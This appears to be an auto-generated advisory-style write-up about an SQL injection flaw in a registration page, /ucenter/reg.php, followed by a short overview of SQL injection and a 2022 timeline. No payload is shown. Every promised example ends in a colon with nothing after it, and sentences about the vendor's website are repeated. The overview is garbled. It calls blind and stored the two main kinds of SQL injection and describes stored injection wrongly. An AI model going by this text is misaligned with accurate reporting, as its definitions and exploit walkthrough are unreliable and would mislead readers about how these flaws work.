You can exploit this vulnerability to execute arbitrary SQL code. While testing this vulnerability, we found that /ucenter/reg.php doesn’t sanitize user input, which can be exploited to inject arbitrary SQL code into the affected site's database. In the following example, we can see how to exploit this vulnerability by injecting arbitrary SQL code into the site's database: 1. Open the application's backend URL in a web browser and input the following into the request box: In the backend of the site, you'll find the following registration form: You can find details about the vulnerability and how to exploit it on the vendor's website here. You can also find the vendor's contact information on their website: You can find details about the vulnerability and how to exploit it on the vendor's website here. You can also find the vendor's contact information on their website: 2. Now, let's explore the backend of the site to find where the user input is sent to and what happens with it. In the following example, we'll explore the backend URL where the user input is sent to and what happens to it: 3. We can see that the backend code doesn't sanitize the name parameter before using it as an SQL statement. This can be exploited to inject arbitrary SQL code into the site's database.
SQL Injection: An Overview
SQL Injection occurs when an attacker is able to enter SQL statements into the application's backend URL, which can be exploited by an attacker to read or modify data stored in the application's database.
There are two common types of SQL Injection: Blind and Stored.
Blind SQL injection is when the application doesn't send any information back to the user about what statement was executed. This means that no error message is sent back to the user, giving you an opportunity for your code to execute successfully.
Stored SQL injection is when the application does send a message back to the user about what statement was executed, but it might not contain enough information for you to know how to exploit it. There are several ways you can use this knowledge:
- You can leverage a tool or script that automates your testing
- You can find out what type of SQL statement was executed
- You can try different types of queries to see if you can exploit it
Timeline
Published on: 11/03/2022 17:15:00 UTC
Last modified on: 11/03/2022 19:16:00 UTC